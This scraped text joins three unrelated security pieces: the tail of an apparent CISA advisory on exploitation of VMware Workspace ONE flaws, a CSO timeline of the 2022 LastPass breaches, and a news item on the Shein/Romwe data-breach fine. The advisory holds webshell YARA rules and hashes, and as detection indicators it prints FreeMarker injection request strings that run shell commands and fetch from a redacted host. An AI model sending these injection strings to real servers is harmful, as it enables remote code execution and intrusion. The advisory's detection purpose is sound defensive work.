$string10 = "J-Spy ver"
$string11 = "no permission ,die"
$string12 = "int iPort = Integer.parseInt"
condition:
filesize < 50KB and 12 of ($string*)
}
Note: the Dingo J-spy webshell is an example of post-exploitation tools that actors have used. Administrators should examine their network for any sign of post-exploitation activity.
Update June 2, 2022:
The following third-party YARA rule may detect unmodified instances of the Godzilla webshell on infected hosts:
rule Godzilla_Webshell  
{   
 strings:  
 $string1 = "TomcatListenerMemShellFromThread"  
 $string2 = "String xc ="  
 $string3 = "String pass ="  
 $string4 = "ServletRequestListener"  
 $string5 = "cmds = new String"  
 $string6 = "cmd"  
 $string7 = "bin/bash"  
 $string8 = "getInputStream"  
 $string9 = "javax.crypto.Cipher c = javax.crypto.Cipher.getInstance"  
 $string10 = "godzilla"  
 condition:  
 filesize < 20KB and 10 of ($string*)  
} 
The following third-party YARA rule may detect unmodified instances of the TomCat JSP webshell on infected hosts:
rule Tomcatjsp_Webshell  
{  
 strings:  
 $string1 = "ExecShellCmd"  
 $string2 = "stCommParams"  
 $string3 = "nKeyOffset = EncryptData"  
 $string4 = "InputStream is = process.getInputStream"  
 $string5 = "Process process = Runtime.getRuntime"  
 $string6 = "ExecBinary"  
 $string7 = "byte bzKey"  
 $string8 = "nKeyOffset++"  
 $string9 = "HttpServletRequest request, HttpServletResponse response"   $string10 = "connect_test cmd"  
 $string11 = "exec cmd"  
 $string12 = "file upload"  
 condition:  
 filesize < 25KB and 12 of ($string*)  
} 
 
The following third-party YARA rule may detect unmodified instances of the reverse SOCKS proxy on infected hosts.
rule reversesocks_tool  
{  
 md5 = "dc88c5fe715b5f706f9fb92547da948a"   strings:  
 $string1 = "revsocks"  
 $string2 = "-connect"  
 $string3 = "client:8080 -pass test"  
 $string4 = "RSA TESTING KEY"  
 $string5 = "SETTINGS_MAX_CONCURRENT_STREAMS"   $string6 = "Start on the server:"  
 $string7 = "closing connection"  
 $string8 = "socks 127.0.0.1:1080"  
 $string9 = "revsocks -listen :8080"  
 condition:  
 uint16(0) == 0x457F and filesize < 6MB and 8 of ($string*)  } 
Update End
Administrators should conduct behavioral analysis on root accounts of vulnerable systems by: 
Table 1: Third-party IOCs for Exploitation of CVE-2022-22954 and CVE-2022-22960 
Used around April 12–14, 2022 (Updated June 2, 2022)
 
catalog 
portal/ui/oauth/verify?error=&deviceUdid=${"freemarker.template.utility.Execute"?new()("cat  /etc/hosts")} 
/catalog 
portal/ui/oauth/verify?error=&deviceUdid=${"freemarker.template.utility.Execute"?new()("wget  -U "Hello 1.0" -qO - http://[REDACTED]/one")} 
Search for this function in: 
/opt/vmware/horizon/workspace/logs/greenbox_web.log
Update June 2, 2022:
or /opt/vmware/horizon/workspace/logs/greenbox_web.log*
freemarker.template.utility.Execute may be legitimate but could also indicate malicious shell commands. You should URL decode the logs before searching for freemarker.template.utility.Execute.
horizon.jsp  
June 2, 2022 Update:
(jquery.jsp)
5b0bfda04a1e0d8dcb02556dc4e56e6a (MD 5)
Update End
jspy  
Update June 2, 2022:
C509282c94b504129ac6ef168a3f08a8 (MD 5)
Update End
godzilla 
Update June 2, 2022:
app.jsp 
4cd8366345ad4068feca4d417738b4bd (MD 5)
Update End
 
Update May 25, 2022: see Palo Alto Networks Unit 42 Threat Brief: VMware Vulnerabilities Exploited in the Wild (CVE-2022-22954 and Others) for additional IOCs to detect possible exploitation or compromise. Note: due to the urgency to share this information, CISA has not yet validated this content.
If administrators discover system compromise, CISA recommends they:
CISA recommends organizations update impacted VMware products to the latest version or remove impacted versions from organizational networks. CISA does not endorse alternative mitigation options. As noted in ED 22-03 Mitigate VMware Vulnerabilities, CISA expects malicious cyber actors to quickly develop a capability to exploit newly released vulnerabilities CVE-2022-22972 and CVE-2022-22973 in the same impacted VMware products. ED 22-03 directs all Federal Civilian Executive Branch agencies to enumerate all instances of impacted VMware products and deploy updates in VMware Security Advisory VMSA-2022-0014 or to remove the affected software from the agency network until the updates can be applied.
CISA encourages recipients of this CSA to report incidents to CISA via CISA’s 24/7 Operations Center (report@cisa.gov or 888-282-0870)
[1] VMware Security Advisory VMSA-2022-0011
[2] Ibid
Update June 2, 2022:
Threat actors and their malware have used the TTPs in table 1 when exploiting CVE-2022-22954 and/or CVE-2022-22960 and conducting related activity. See the ATT&CK for Enterprise framework for all referenced threat actor tactics and techniques.
Table 2: MITRE ATT&CK TTPs
File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification
[T1222.002]
Indicator Removal on Host [T1070]
Archive Collected Data [T1560]
Update End
Initial Version: May 18, 2022|May 25, 2022: Added Industry Resource|June 2, 2022: Added Detection Signatures, IOCs, and TTPs

source

By Michael Hill
UK Editor, CSO |
On November 30, 2022, password manager LastPass informed customers of a cybersecurity incident following unusual activity within a third-party cloud storage service. While LastPass claims that users’ passwords remain safely encrypted, it admitted that certain elements of customers’ information have been exposed. The security incident was the latest to affect the service in recent times in the wake of unauthorized access to its development environment in August last year, serious vulnerabilities in 2017, a phishing attack in 2016, and a data breach in 2015.
Here is a timeline of the most recent LastPass data breaches from August to present.
[Editor’s note: This article, originally published on January 11, 2023, will be updated as new information becomes available.]
LastPass CEO Karim Toubba wrote to inform LastPass users that the company had detected unusual activity within portions of the LastPass development environment. “We have determined that an unauthorized party gained access to portions of the LastPass development environment through a single compromised developer account and took portions of source code and some proprietary LastPass technical information. Our products and services are operating normally.”
In response to the incident, LastPass deployed containment and mitigation measures and engaged a cybersecurity and forensics firm, Toubba added. “While our investigation is ongoing, we have achieved a state of containment, implemented additional enhanced security measures, and see no further evidence of unauthorized activity.”
LastPass announced that it had completed its investigation of the August breach and determined that the attacker did not access any customer data or password vaults. It also confirmed that the access point was a developer’s compromised computer and that the attacker was in the system for a total of four days.
LastPass notified users of a new security incident that its team was investigating. “We recently detected unusual activity within a third-party cloud storage service, which is currently shared by both LastPass and its affiliate, GoTo. We immediately launched an investigation, engaged Mandiant, a leading security firm, and alerted law enforcement,” Toubba wrote.
The company determined that an unauthorized party, using information obtained in the August 2022 incident, was able to gain access to certain customers’ information, Toubba said, while stating that passwords remained safely encrypted due to LastPass’s Zero Knowledge architecture. “We are working diligently to understand the scope of the incident and identify what specific information has been accessed. In the meantime, we can confirm that LastPass products and services remain fully functional,” he added. Users were advised to follow best practices around the setup and configuration of LastPass.
Yoav Iellin, senior researcher at Silverfort, stated that given the vast number of passwords LastPass protects globally, it remains a big attack target. “The company has admitted the threat actor gained access using information obtained in the previous compromise. Exactly what this information is remains unclear, but typically it’s best practice after suffering a breach for the organization to generate new access keys and replace other compromised credentials. This ensures things like cloud storage and backup access keys cannot be reused.”
Iellin urged users to stay vigilant for updates from the company and to take time to verify these were legitimate before taking any action. “In addition, ensuring you have two-factor authentication on any applications with passwords in LastPass and changing passwords will provide the utmost level of security,” Iellin added.
In an update on the investigation, Toubba stated source code and technical information stolen from the LastPass development environment were used to target an employee and obtain credentials/keys, which were used to access and decrypt some storage volumes within a cloud-based storage service. “To date, we have determined that once the cloud storage access key and dual storage container decryption keys were obtained, the threat actor copied information from backup that contained basic customer account information and related metadata including company names, end-user names, billing addresses, email addresses, telephone numbers, and the IP addresses from which customers were accessing the LastPass services,” Toubba wrote.
The threat actor was also able to copy a backup of customer vault data from the encrypted storage container, which is stored in a proprietary binary format that contains both unencrypted data, such as website URLs, as well as fully encrypted sensitive fields such as website usernames and passwords, secure notes, and form-filled data, he added. “There is no evidence that any unencrypted credit card data was accessed.”
Toubba warned that the threat actor may attempt to use brute force to guess master passwords and decrypt the copies of vault data they took, but because of the hashing and encryption methods used by LastPass it would be extremely difficult to attempt to brute-force guess master passwords for those customers who follow its password best practices, he continued.
“The threat actor may also target customers with phishing attacks, credential stuffing, or other brute-force attacks against online accounts associated with your LastPass vault.” LastPass added additional logging and alerting capabilities to help detect any further unauthorized activity and is actively rotating all relevant credentials and certificates that may have been affected and supplementing existing endpoint security, Toubba stated. “We are also performing an exhaustive analysis of every account with signs of any suspicious activity within our cloud storage service, adding additional safeguards within this environment, and analyzing all data within this environment to ensure we understand what the threat actor accessed. This remains an ongoing investigation. We have notified law enforcement and relevant regulatory authorities of this incident out of an abundance of caution. In the meantime, our services are running normally, and we continue to operate in a state of heightened alert.”
An anonymous plaintiff filed a class action lawsuit against LastPass relating to the data breaches. “This is a class action for damages against Defendant for its failure to exercise reasonable care in securing and safeguarding highly sensitive consumer data in connection with a massive, months-long data breach,” the lawsuit read. Highly sensitive data was exposed, it continued, impacting potentially millions of LastPass users, resulting in the unauthorized public release and subsequent misuse of their names, end-user names, billing addresses, email addresses, telephone numbers, IP addresses from which customers were accessing the LastPass service, and customer vault data. The lawsuit claimed that LastPass’ “best practices” were woefully insufficient to protect its users’ private information from compromise and misuse.
In an update on the ongoing investigation into the security incident, Paddy Srinivasan, CEO of LastPass parent company GoTo, stated that a threat actor exfiltrated encrypted backups from a third-party cloud storage service related to the following products: Central, Pro, join.me, Hamachi, and RemotelyAnywhere. “We also have evidence that a threat actor exfiltrated an encryption key for a portion of the encrypted backups. The affected information, which varies by product, may include account usernames, salted and hashed passwords, a portion of multi-factor authentication (MFA) settings, as well as some product settings and licensing information. In addition, while Rescue and GoToMyPC encrypted databases were not exfiltrated, MFA settings of a small subset of their customers were impacted,” Srinivasan wrote.
At the time of writing, Srinivasan claimed there was no evidence of exfiltration affecting any other GoTo products other than those referenced or any of GoTo’s production systems. “We are contacting affected customers directly to provide additional information and recommend actionable steps for them to take to further secure their accounts,” Srinivasan added. “Even though all account passwords were salted and hashed in accordance with best practices, out of an abundance of caution, we will also reset the passwords of affected users and/or reauthorize MFA settings where applicable. In addition, we are migrating their accounts onto an enhanced Identity Management Platform, which will provide additional security with more robust authentication and login-based security options.”
A LastPass update on its second breach confirmed that it was related to the initial incident that ended on August 12, 2022. The company claimed that the connection was not obvious because the attacker’s tactics, techniques, and procedures (TTPs) and the indicators of compromies (IOCs) “were not consistent with those of the first [breach].”
The second attack did make use of information exfiltrated during the initial incident: valid credentials of a senior DevOps engineer who had access to a shared cloud storage environment. This made it difficult to identify the attacker’s activity as it appeared to be legitimate. AWS GuardDuty Alerts did notify LastPass of anomalous behavior after the attacker to use cloud identity and access management roles for unauthorized activity.
Michael Hill is the UK editor of CSO Online. He has spent the past five-plus years covering various aspects of the cybersecurity industry, with particular interest in the ever-evolving role of the human-related elements of information security.
Copyright © 2023 IDG Communications, Inc.
Copyright © 2023 IDG Communications, Inc.

source

Zoetop, the holding company behind retailer giant Romwe and Shein, has been fined $1.9m after it failed to properly inform customers of a data breach that reportedly affected millions of users.
According to a notice from New York's attorney general's office this week, the 2018 data breach saw Zoetop failing to secure customers' data, not adequately informing customers of it and trying to keep the real impact of the leak quiet.
The 2018 hack saw credit cards and personal information theft, including names, emails and hashed passwords. The data breach reportedly affected 39 million Shein and seven million Romwe accounts, more than 800,000 of which belonged to New Yorkers.
"Shein and Romwe's weak digital security measures made it easy for hackers to shoplift consumers' personal data," said New York attorney general Letitia James.
"[They] must button up their cybersecurity measures to protect consumers from fraud and identity theft. This agreement should send a clear warning to companies that they must strengthen their digital security measures and be transparent with consumers; anything less will not be tolerated."
More generally, risks connected to an organization not disclosing that it has been breached are substantial, according to Patrick Wragg, cyber incident response manager at Integrity360.
Talking to Infosecurity, the executive said the first type of risk is financial. 
"Not only will the organization suffer from operational issues (disruption to service) and therefore loss of revenue, but if they do not disclose the breach to the likes of the ICO (especially if customer data is stolen), the fines are often exponentially bigger than the threat actor ransom itself," Wragg explained.
Further, companies may suffer reputational and trust risks should they neglect to disclose a data breach.
"If customers find out that their data was stolen and the company tried to hide the fact, then they will be much less likely to use that company in the future due to trust," Wragg said.
"Companies/partners will [also] be less likely to do business with a company that has purposely not disclosed a breach because they don't want to get caught in the 'black hole' of negative reception."
The Zoetop news comes in the wake of a duo of data breaches in Australia that affected subsidiaries of the telecommunication giant Singtel.

source